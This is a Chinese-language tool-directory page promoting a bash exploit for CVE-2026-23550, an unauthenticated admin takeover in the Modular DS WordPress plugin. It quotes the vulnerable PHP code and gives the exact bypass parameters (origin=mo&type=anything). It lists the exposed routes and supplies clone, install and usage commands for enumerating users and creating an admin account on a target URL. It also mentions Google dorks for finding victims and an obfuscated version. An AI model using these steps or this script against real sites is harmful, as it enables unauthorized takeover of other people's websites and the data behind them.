Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-23550 — Bash 脚本,用于 WordPress 用户枚举和自动创建管理员账户,利用 CVE-2026-23550 绕过身份验证,实现未认证的管理员接管。 | Kitploit
工具/GitHubGitHub/dedsecteam-blackhat/cve-2026-23550
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubdedsecteam-blackhat/cve-2026-23550

CVE-2026-23550

Bash 脚本,用于 WordPress 用户枚举和自动创建管理员账户,利用 CVE-2026-23550 绕过身份验证,实现未认证的管理员接管。

查看仓库
16个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-23550

Modular DS <=2.5.1 - 未认证管理员接管

CVE ID: CVE-2026-23550 CVSS 评分: 10.0(严重) 受影响插件: Modular DS WordPress 插件 受影响版本: 所有版本直至并包括 2.5.1 已修补版本: 2.5.2(2026 年 1 月 14 日发布) 活跃利用: 自 2026 年 1 月 13 日起已在野外确认

该插件将其 API 路由暴露在 /api/modular-connector/. 前缀下。 这些路由被分组在 RouteServiceProvider.php 中的认证中间件之后。 然而,使用存在缺陷的 isDirectRequest() 方法可以绕过认证。

来自 HttpUtils.php 的易受攻击代码:

root@kitploit:~
public static function isDirectRequest(): bool
{
    $request = \Modular\ConnectorDependencies\app('request');
    $userAgent = $request->header('User-Agent');
    $userAgentMatches = $userAgent && Str::is('ModularConnector/* (Linux)', $userAgent);
    $originQuery = $request->has('origin') && $request->get('origin') === 'mo';
    $isFromQuery = ($originQuery || $userAgentMatches) && $request->has('type');
    
    // When is wp-load.php request
    if ($isFromQuery) {
        return \true;
    }
    
    return \false;
}

绕过方式非常简单:只需在请求中包含参数 origin=mo&type=anything。无需验证签名、密钥、IP 或强制 User-Agent——仅凭这些参数就足以让请求被视为 Modular direct request

一旦请求被视为"direct",ModularGuard.php 中的认证中间件仅通过 validateOrRenewAccessToken() 检查站点是否连接到 Modular。传入请求与 Modular 本身之间没有加密关联。

暴露的路由 成功绕过认证后,攻击者可以访问:

root@kitploit:~
/login/{modular_request} – 远程登录(管理员访问)

/server-information – 敏感系统数据

/users/{modular_request} – 用户枚举

/backup/* – 站点备份

/cache/clear – 清除缓存

/manager/* – 管理功能

/woocommerce/{modular_request} – WooCommerce 统计

最关键的登录路由

root@kitploit:~
public function getLogin(SiteRequest $modularRequest)
{
    $user = data_get($modularRequest->body, 'id');

    if (!empty($user)) {
        $user = get_user_by('id', $user);
    }

    if (empty($user)) {
        Cache::driver('wordpress')->forget('user.login');
        $user = ServerSetup::getAdminUser();  // FALLBACK KE ADMIN MANAPUN
    } else {
        Cache::driver('wordpress')->forever('user.login', $user->ID);
    }

    if (empty($user)) {
        throw new \Exception('No admin user detected.');
    }

    $cookies = ServerSetup::loginAs($user, true);  // AUTO-LOGIN

    return Response::redirectTo(admin_url('index.php'))
        ->withCookies($cookies);
}

如果请求体中不存在用户 ID,代码将查找任何存在的管理员 (getAdminUser()) 并直接登录。

作者: (Dedsec Team) 描述: 一个用于 WordPress 用户枚举和自动创建管理员账户的强大 bash 脚本。仅用于教育目的和授权安全测试。

🚀 功能特性

  • 用户枚举 – 通过循环遍历作者 ID(/?author=1、/?author=2 等)发现 WordPress 用户名
  • Google Dork 展示 – 显示有用的 Google dork 以查找易受攻击的 WordPress 站点(可选)
  • 利用模式 – 尝试在目标上创建新的管理员用户(需要易受攻击的插件/主题或特定 CVE)
  • 清晰输出 – 彩色控制台反馈,便于阅读

📦 环境要求

  • Bash 4+
  • curl(用于 HTTP 请求)
  • base64(如果你使用混淆版本,嘿嘿)

🔧 安装

root@kitploit:~
git clone https://github.com/DedsecTeam-BlackHat/CVE-2026-23550.git
cd CVE-2026-23550
chmod +x CVE-2026-23550.sh

使用方法

root@kitploit:~
./CVE-2026-23550.sh [options] <target_url>
  1. 枚举目标上的用户 ./CVE-2026-23550.sh -e -t http://targetsite.com
  2. 枚举然后创建管理员用户 ./CVE-2026-23550.sh -t http://targetsite.com -c -u dedsec_admin -p P@ssw0rd!
  3. 仅显示 Google dorks ./CVE-2026-23550.sh -d
下载工具